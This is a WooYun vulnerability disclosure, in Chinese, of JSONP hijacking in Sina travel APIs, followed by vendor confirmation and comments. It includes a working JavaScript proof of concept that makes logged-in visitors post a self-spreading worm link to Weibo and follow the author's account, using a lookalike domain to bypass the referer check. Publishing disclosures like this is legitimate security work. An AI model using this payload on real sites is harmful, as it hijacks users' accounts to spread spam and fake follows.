当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171499

漏洞标题:新浪微博JSONP劫持之点我链接开始微博蠕虫+刷粉丝

相关厂商:新浪

漏洞作者: zhchbin

提交时间:2016-01-20 22:34

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-20: 细节已通知厂商并且等待厂商处理中
2016-01-21: 厂商已经确认,细节仅向厂商公开
2016-01-31: 细节向核心白帽子及相关领域专家公开
2016-02-10: 细节向普通白帽子公开
2016-02-20: 细节向实习白帽子公开
2016-03-05: 细节向公众公开

简要描述:

JSONP劫持,域名是sina.com.cn的子域,就报给新浪吧。放了快一个月,再不发我怕我控制不住真的去玩蠕虫,刷粉丝了。

详细说明:

0x01 发微博
在新浪旅游的攻略页面中有个提问的功能,提示“此问题会同步到你的新浪微博”。

http://travel.sina.com.cn/fj_sanming_685-xiangqing-gonglue/


20160119000615.png


具体接口如下:

http://u.travel.sina.com.cn/api-i/qa/sendweibo?content=asdf1&callback=jQuery17206884582478087395_1452354554166&_=1452354673975


这个接口是JSONP的形式,有检查referer,但是不严格,可以轻松绕过,可以绕过的referer例子:

http://travel.sina.com.cn.zhchbin.xyz/


0x02 关注
有些攻略页面会嵌入一些旅行网的微博,上面有关注功能,比如:

http://travel.sina.com.cn/aolanduo_2998-xiangqing-gonglue/


具体接口如下:

http://data.travel.sina.com.cn/award/friendships.php?uid=1684037597&times=1453205469390&callback=jQuery172005376373999752104_1453205445886&_=1453205469391


这个接口也是JSONP,没有任何检查,直接劫持即可。
通过这两个接口,我就可以成为网红了应该,劫持发微博蠕虫,同时刷粉丝!

漏洞证明:

登录微博,点我链接:

http://travel.sina.com.cn.zhchbin.xyz/travel_jsonp.html


测试代码:

<script type="text/javascript" src="http://apps.bdimg.com/libs/jquery/2.1.4/jquery.js"></script>
<script>
$(function() {
  var sendweibo = 'http://u.travel.sina.com.cn/api-i/qa/sendweibo?'
  var content = "这里有好东西,赶紧看,你懂得!http://travel.sina.com.cn.zhchbin.xyz/travel_jsonp.html"
  sendweibo = sendweibo + 'content=' + content + '&_=' + Date.now();
  $.ajax({
    url: sendweibo,
    jsonp: "callback",
    dataType: "jsonp",
    success: function(response) {
      console.log(response);
    }
  });
  var follow_me = 'http://data.travel.sina.com.cn/award/friendships.php?uid=1904533355&times=' + Date.now();
  $.ajax({
    url: follow_me,
    jsonp: "callback",
    dataType: "jsonp",
    success: function(response) {
      console.log(response);
    }
  });
});
</script>

修复方案:

修复JSONP劫持
欢迎关注我微博!!http://weibo.com/zhchbin

版权声明:转载请注明来源 zhchbin@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-21 10:03

厂商回复:

感谢支持,漏洞修复中

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-20 22:36 | thewind ( 普通白帽子 | Rank:149 漏洞数:37 | 小白……)

    前排混眼熟

  2. 2016-01-20 22:53 | Mieless ( 实习白帽子 | Rank:35 漏洞数:10 | 我是来打酱油的。)

    唉,就差个橙V认证

  3. 2016-01-20 22:59 | 薄雾 ( 路人 | Rank:10 漏洞数:2 | 喜欢交友。喜欢动脑。)

    前排挤挤

  4. 2016-01-20 23:27 | zhchbin ( 普通白帽子 | Rank:115 漏洞数:25 | 要走得再远一些!|但行好事,不问前程)

    感谢@xsser 这么快就帮我审核了!!@thewind 你Rank比我高多了,我来混眼熟才对。

  5. 2016-01-21 00:12 | sqlfeng ( 普通白帽子 | Rank:376 漏洞数:57 | http://weibo.com/fds1986)

    这个B装的我给82分,剩下的18分我以666的形式给你

  6. 2016-01-21 00:52 | Mayter ( 普通白帽子 | Rank:153 漏洞数:39 | 笼鸡有食汤锅近,野鹤无粮天地宽.)

    6666

  7. 2016-01-21 03:59 | Mengter ( 路人 | Rank:6 漏洞数:2 | 太难了.)

    前排出售西瓜小板凳瓜子矿泉水,买不起的让一让

  8. 2016-01-21 03:59 | _Thorns ( 普通白帽子 | Rank:1662 漏洞数:248 | WooYun is the Bigest gay place. 网络工...)

    @Mengter 洗洗睡吧

  9. 2016-01-21 04:21 | Mengter ( 路人 | Rank:6 漏洞数:2 | 太难了.)

    @_Thorns 卖完再睡.

  10. 2016-01-21 05:12 | _Thorns ( 普通白帽子 | Rank:1662 漏洞数:248 | WooYun is the Bigest gay place. 网络工...)

    @Mengter .....

  11. 2016-01-21 07:50 | 火风暴 ( 路人 | Rank:25 漏洞数:5 | 黑夜给了我无情的眼睛让我拿着冷血的剑,策...)

    说,你跟呆子不开口啥关系

  12. 2016-01-21 07:55 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    666666666

  13. 2016-01-21 09:09 | zhchbin ( 普通白帽子 | Rank:115 漏洞数:25 | 要走得再远一些!|但行好事,不问前程)

    @火风暴 我说我是他小号你信吗?好吧,不能装,我是呆粉!

  14. 2016-01-21 09:53 | 呆子不开口 ( 普通白帽子 | Rank:370 漏洞数:34 | 求各种兼职)

    @火风暴 他原来是我小号,后来长大了,翅膀硬了,跑了

  15. 2016-01-27 09:24 | Anthea ( 路人 | Rank:6 漏洞数:2 | 这世上总有另一个我,做着我不敢做的事,过...)

    讲真。。你就是缺个女朋友。。所以才老挖这种刷粉儿的洞

  16. 2016-01-27 11:24 | zhchbin ( 普通白帽子 | Rank:115 漏洞数:25 | 要走得再远一些!|但行好事,不问前程)

    @Anthea 我妈都木有催我!!!